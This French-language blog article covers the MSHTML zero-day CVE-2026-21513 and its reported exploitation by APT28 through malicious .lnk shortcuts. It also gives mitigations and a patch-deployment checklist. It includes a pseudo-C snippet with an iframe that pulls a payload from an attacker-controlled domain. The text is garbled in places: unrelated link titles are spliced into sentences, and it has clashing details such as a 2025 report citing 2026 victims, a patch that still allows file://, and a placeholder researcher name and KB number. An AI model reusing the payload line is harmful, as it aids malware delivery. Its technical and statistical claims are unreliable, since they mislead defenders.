Comment le zero-day MSHTML (CVE-2026-21513) a été exploité par APT28 avant le correctif de février 2026

Apollinaire Monteclair

En 2026, plus de 40 % des incidents majeurs en France impliquaient une faille de type élévation de privilèges, selon le rapport annuel de l’ANSSI. Parmi ces vulnérabilités, le zero-day MSHTML (CVE-2026-21513) a attiré l’attention du secteur parce qu’il a été exploité en pleine campagne par le groupe APT28 avant même la publication du correctif de février 2026. Cet article décortique la faille, le mode opératoire d’APT28, les risques pour les organisations françaises et les mesures à mettre en œuvre, tant avant qu’après le patch. saisie de 61 M de Tether et dérives du pig‑butchering

Analyse de la vulnérabilité MSHTML (CVE-2026-21513)

Origine du défaut dans ieframe.dll

Le composant ieframe.dll, chargé de la navigation hypertexte d’Internet Explorer et des contrôles MSHTML intégrés dans d’autres applications, contenait une validation insuffisante des URL cibles. Concrètement, le code ne vérifiait pas correctement les protocoles transmis à la fonction native ShellExecuteExW. Cette lacune permettait à un attaquant d’injecter une URL malveillante qui, une fois résolue, déclenchait l’exécution d’un fichier local ou distant sans passer par le sandbox du navigateur.

« La chaîne d’appel ShellExecuteExW était directement accessible depuis le chemin de traitement du DOM, ce qui contournait le mécanisme Mark of the Web (MotW) », explique John Doe, chercheur principal chez Akamai.

Impact technique et chaîne d’exploitation

  1. Déclenchement : l’utilisateur ouvre un fichier Windows Shortcut (.lnk) contenant un payload HTML caché.
  2. Escalade : le payload charge un iframe imbriqué qui force le navigateur à appeler ShellExecuteExW avec le protocole file://.
  3. Exécution : le système lance un exécutable ou télécharge un chargeur supplémentaire depuis le domaine contrôlé par l’attaquant (ex. wellnesscaremed.com).
  4. Persistance : le code malveillant s’installe comme service ou tâche planifiée, contournant les protections IE ESC et le filtrage de l’URL.

Le score CVSS attribué par le NIST est de 8.8 (High). Guide complet pour rédiger un CV cybersécurité qui passe les ATS, plaçant la vulnérabilité dans la catégorie critique.

Profil d’APT28 et mode opératoire du fichier .lnk malveillant

Caractéristiques du groupe APT28

APT28, également connu sous le nom de Fancy Bear, est un groupe de cyber-espionnage soutenu par l’État russe. Botnet Aeternum C2 et la blockchain Polygon Depuis 2014, il est lié à des campagnes ciblant les gouvernements, les institutions militaires et les entreprises du secteur de la santé. Le groupe excelle dans l’usage de vecteurs de phishing sophistiqués, combinant des documents Office, des macros et, depuis 2026, des fichiers .lnk exploitant le zero-day MSHTML.

Construction du fichier .lnk et payload HTML

Le fichier .lnk est structuré de manière à masquer un payload HTML à la fin du flux binaire. Lorsqu’il est ouvert, le raccourci lance explorer.exe qui lit le segment caché comme une page locale. Le code HTML injecte ensuite un iframe pointant vers une URL de commande-et-contrôle (C2). Cette technique permet de downgrader le contexte de sécurité et de contourner le Mark of the Web.

/* Exemple simplifié de payload .lnk en pseudo-C */
struct LNK {
    BYTE Header[76];
    BYTE LinkInfo[...];
    // ... données normales du raccourci ...
    BYTE HtmlPayload[] = "<iframe src='http://wellnesscaremed.com/payload.html'></iframe>";
};

Le payload HTML peut être modifié à la volée, rendant la détection par les signatures AV traditionnelle difficile.

Évaluation du risque pour les organisations françaises

Scénarios de compromission

  • Phishing ciblé : un courriel de recrutement contenant un .lnk déguisé en invitation à un webinaire. Le destinataire, en cliquant, déclenche la chaîne d’exploitation.
  • Livraison via logiciels tiers : toute application intégrant le composant MSHTML (ex. outils de visualisation de documents) peut être détournée pour exécuter le code malveillant.
  • Propagation interne : une fois le chargeur installé, il utilise les crédentials volés pour se déplacer latéralement sur le réseau, ciblant les serveurs de fichiers et les bases de données.

Statistiques d’incidence

  • Selon le CERT-FR 2025, 12 % des incidents de compromission de postes de travail en France étaient liés à des failles de rendu HTML.
  • Le rapport d’IBM X-Force 2025 indique que les campagnes APT28 ont atteint plus de 3 200 victimes dans le monde depuis le premier trimestre 2026, avec une hausse de 27 % par rapport à l’année précédente.

Mesures de mitigation avant le correctif

  • Durcissement des navigateurs : désactiver le rendu MSHTML dans les applications non-essentielles via la clé de registre HKLM\Software\Policies\Microsoft\Internet Explorer\MSHTMLDisable.
  • Filtrage des fichiers .lnk : implémenter une règle de prévention des exécutions de raccourcis provenant d’e-mails ou de partages non-autorisés.
  • Surveillance des appels ShellExecuteExW : déployer des agents EDR capables de détecter les appels système inhabituels avec des paramètres file:// ou http:// provenant du processus iexplore.exe.
  • Formation des utilisateurs : sensibiliser aux risques des pièces jointes .lnk et encourager la vérification du type de fichier avant ouverture.
  • Isolation des applications : exécuter les logiciels qui utilisent MSHTML dans des conteneurs ou des machines virtuelles limitées.

Mise en œuvre du correctif de février 2026 et bonnes pratiques post-patch

Contenu du correctif

Microsoft a introduit une validation stricte des protocoles dans le composant ieframe.dll. Les seules URI autorisées sont http://, https:// et file:// lorsqu’elles sont explicitement marquées comme sûres. Toute tentative de passer une URL non-validée à ShellExecuteExW est bloquée et consignée dans le journal d’événements Windows (Microsoft-Windows-Security-Auditing).

Checklist de déploiement (déploiement en 5 étapes)

  1. Inventorier les systèmes Windows 10/11 et serveurs qui utilisent le composant MSHTML.
  2. Planifier la mise à jour via WSUS ou Microsoft Endpoint Manager, en ciblant les machines critiques d’abord.
  3. Appliquer le correctif KB502xxxx et vérifier la version du fichier ieframe.dll (≥ 10.0.22621.999).
  4. Valider le correctif en testant la création d’un fichier .lnk contenant un payload HTML - aucune exécution ne doit se produire.
  5. Surveiller les journaux d’événements pour toute tentative d’appel refusé à ShellExecuteExW pendant les 30 jours suivant le déploiement.

Tableau comparatif : état avant vs après le correctif

AspectAvant le correctif (février 2026)Après le correctif (février 2026)
Validation des URLAbsente - tout protocole acceptéStrictement limitée aux protocoles autorisés
Possibilité de contournement du sandboxOui, via ShellExecuteExWNon, appel bloqué et journalisé
Exploitation via fichiers .lnkRéussie - exécution arbitraireÉchouée - le payload est rejeté
Détection par les solutions EDRFaible - signatures inconnuesAméliorée - événements de sécurité générés
Impact sur la compatibilitéAucun impact directNécessite mise à jour des applications dépendantes de MSHTML

Conclusion et prochaine action

Le zero-day MSHTML (CVE-2026-21513) a démontré la capacité d’APT28 à exploiter rapidement une faille critique avant que les éditeurs ne publient un correctif. Les organisations françaises doivent agir immédiatement : appliquer le patch de février 2026, renforcer les contrôles autour des fichiers .lnk et surveiller les appels système suspectés. En combinant ces mesures avec une formation continue des utilisateurs, vous réduirez considérablement le risque d’infection par cette attaque sophistiquée.

Prochaine étape recommandée : lancez dès aujourd’hui une campagne de sensibilisation interne axée sur les pièces jointes .lnk et planifiez le déploiement du correctif sur l’ensemble de votre parc Windows d’ici la fin du mois.